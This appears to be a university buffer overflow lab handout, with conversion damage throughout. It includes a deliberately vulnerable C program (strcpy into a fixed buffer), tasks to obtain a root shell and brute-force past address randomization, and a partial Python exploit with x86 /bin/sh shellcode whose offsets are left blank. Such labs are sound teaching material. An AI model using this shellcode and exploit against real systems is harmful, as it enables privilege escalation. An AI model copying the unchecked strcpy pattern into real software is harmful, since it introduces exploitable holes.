$/*$ This program has a buffer overflow vulnerability. $*/$

#include

#include

#include

int foo$($char $*$str$)$

$\{$

char buffer$[500]$;

$/*$ The following statement has a buffer overflow problem $*/$

strcpy$($buffer$,$ str$)$;

return $1$;

$\}$

int main$($int argc, char $**$argv$)$

$\{$

char str$[800]$;

FILE $*$badfile;

badfile $=$ fopen$("$badfile$","$r$")$;

fread$($str$,$ sizeof$($char$),700,$ badfile$)$;

foo$($str$)$;

printf$("$Returned Properly

$")$;

return $1$;

$\}$ Task $1$ :We provide you with a completed exploit code called $$exploit$.$py$.$ You need

to adjust the variables of the program accordingly and fill in any missing code to

fulfill the buffer overflow attack.

Notes on python, you don't need to compile a $.$py file to run it$.$ Python is an

interpreted language, and you can run the scripts directly, either using:

python exploit.py

Or make your script executable by adding $"$#$!/$usr$/$bin$/$python$3"$ to the top of the

script, making the file executable with "chmod u$+$x exploit.py$"$ and then running:

$./$exploit$.$py

The book utilizes the second version $./$exploit$.$py

After you finish adjusting the above program, run it$.$ This will generate the contents

for $$badfile$.$ Then compile and run the vulnerable program "stack.c$".$ If your exploit

is implemented correctly, you should be able to get a shell:

$ id

uid$=1000($seed$)$ gid$=1000($seed$)$ groups$=1000($seed$)$

Task$2$: Find a way to obtain root shell $($read book$/$slides$).$

you should get the following output:

VM# id

uid$=1000($seed$)$ gid$=1000($seed$)$ euid$=0($root$)$ groups$=1000($seed$)$

Task$3$: On $32-$bit Linux machines, stacks only have $19$ bits of entropy, which means

the stack base address can have $2^19=524,288$ possibilities. This number is not

that high and can be exhausted easily with the brute$-$force approach. In this task, we

use such an approach to defeat the address randomization countermeasure on our $32-$

bit VM$.$ First, we turn on the Ubuntu$$s address randomization using the following

command:

sudo $/$sbin$/$sysctl $-$w kernel.randomize$\_$va$\_$space$=2$

Then use the shell script in the book to figure out how to attack the vulnerable

program repeatedly.

To summarize, the lab goal is:

Task $1-$ edit the given source code $$exploit$.$py$$ so that the buffer overflow attack is

successful.

Task $2-$ ensure the shell is running as root.

Task $3-$ Defeat the Address Randomization applied by the operating system.

In your paper show and explain the following:

$-$The adjusted code segments, and describe what changes you made and why.

$-$How you obtained the needed addresses, show screenshots.

$-$The screenshots of the successful buffer overflow attack.

$-$How you made the shell run as root.

$-$How you defeated Address Randomization, screenshot the exploit.py code : #$!/$usr$/$bin$/$python$3$

import sys

shellcode$=($

$"\backslash$x$31\backslash$xc$0"$ # xorl $\%$eax,$\%$eax

$"\backslash$x$50"$ # pushl $\%$eax

$"\backslash$x$68""//$sh$"$ # pushl $$0$x$68732$f$2$f

$"\backslash$x$68""/$bin$"$ # pushl $$0$x$6$e$69622$f

$"\backslash$x$89\backslash$xe$3"$ # movl $\%$esp,$\%$ebx

$"\backslash$x$50"$ # pushl $\%$eax

$"\backslash$x$53"$ # pushl $\%$ebx

$"\backslash$x$89\backslash$xe$1"$ # movl $\%$esp,$\%$ecx

$"\backslash$x$99"$ # cdq

$"\backslash$xb$0\backslash$x$0$b$"$ # movb $$0$x$0$b$,\%$al

$"\backslash$xcd$\backslash$x$80"$ # int $$0$x$80$

$).$encode$(\text{'}$latin$-1\text{'})$

# Fill the content with NOPs

content $=$ bytearray$()$

# Put the shellcode at the end

start $=$

content$[]=$ shellcode

ret $=$

content$[]=($ret$).$to$\_$bytes$(4,$byteorder$=$'little'$)$

# Write the content to a file

with open$(\text{'}$badfile$\text{'},\text{'}$wb$\text{'})$ as f:

f$.$write$($content$)$